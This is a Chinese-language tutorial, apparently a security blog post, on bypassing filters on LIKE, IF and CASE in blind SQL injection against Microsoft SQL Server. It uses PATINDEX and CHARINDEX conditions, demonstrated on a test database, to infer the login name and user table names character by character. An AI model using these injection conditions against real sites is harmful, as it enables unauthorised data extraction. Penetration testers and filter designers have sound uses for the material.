0x01 概要
日站过程中有过滤是很正常的事情.
本方法适用于 过滤了 like
, if
, CASE
也就是 like 注入无法正常使用,但是页面又没有回显的情况
like 替换方法 | 解释 |
---|---|
PATINDEX(‘%pattern%’, expression) | 返回pattern字符串在表达式expression里第一次出现的位置,起始值从1开始算,没有返回0 该函数与 like 高度保持一致,并且可以和 like 一样 使用 _ % [ ] [^]这种通配符进行搜索 |
CHARINDEX(‘pattern’, expression) | 返回pattern字符串在表达式expression里第一次出现的位置,起始值从1开始算,没有返回0 |
0x02 测试数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x02 PATINDEX()
0x02.1 查询user
SQL:select ‘test’ where patindex(‘%sa%’, system_user)>=1;
# system_user = sa
# 对的情况
1> select 'test' where patindex('%sa%', system_user)>=1;
2> go
+-----+
| |
+-----+
| test |
+-----+
(1 rows affected)
# 错误的情况
1> select 'test' where patindex('%aaa%', system_user)>=1;
2> go
+--+
| |
+--+
+--+
(0 rows affected)
0x02.2 查询表名
注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样
例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
例如现在查询得是 test 库得表名
SQL:select ‘test’ where patindex(‘%article%’, (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))>=1
# 第一张表名 = article
# 对的情况
1> SELECT
'test'
WHERE
patindex(
'%article%',
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
) >= 1;
2> go
+-----+
| |
+-----+
| test |
+-----+
(1 rows affected)
# 错误的情况
1> SELECT
'test'
WHERE
patindex(
'%aaaaaaaaaaaaaa%',
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
) >= 1;
2> go
+--+
| |
+--+
+--+
(0 rows affected)
0x03 CHARINDEX()
0x03.1 查询user
SQL:select ‘test’ where charindex(‘s’, system_user)>=1
# system_user = sa
# 对的情况
# system_user第一个字符
1> select 'test' where charindex('s', system_user)>=1
2> go
+-----+
| |
+-----+
| test |
+-----+
(1 rows affected)
# system_user第二个字符
1> select 'test' where charindex('sa', system_user)>=1
2> go
+-----+
| |
+-----+
| test |
+-----+
(1 rows affected)
# 错误的情况
1> select 'test' where charindex('aaaaa', system_user)>=1
2> go
+--+
| |
+--+
+--+
(0 rows affected)
0x03.2 查询表名
SQL:select ‘test’ where charindex(‘ar’, (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))>=1
# 第一张表名 = article
# 对的情况
# 查询前1-2字符
1> SELECT
'test'
WHERE
charindex(
'ar',
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
) >= 1;
2> go
+-----+
| |
+-----+
| test |
+-----+
(1 rows affected)
# 查询1-4个字符
1> SELECT
'test'
WHERE
charindex(
'arti',
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
) >= 1;
2> go
+-----+
| |
+-----+
| test |
+-----+
(1 rows affected)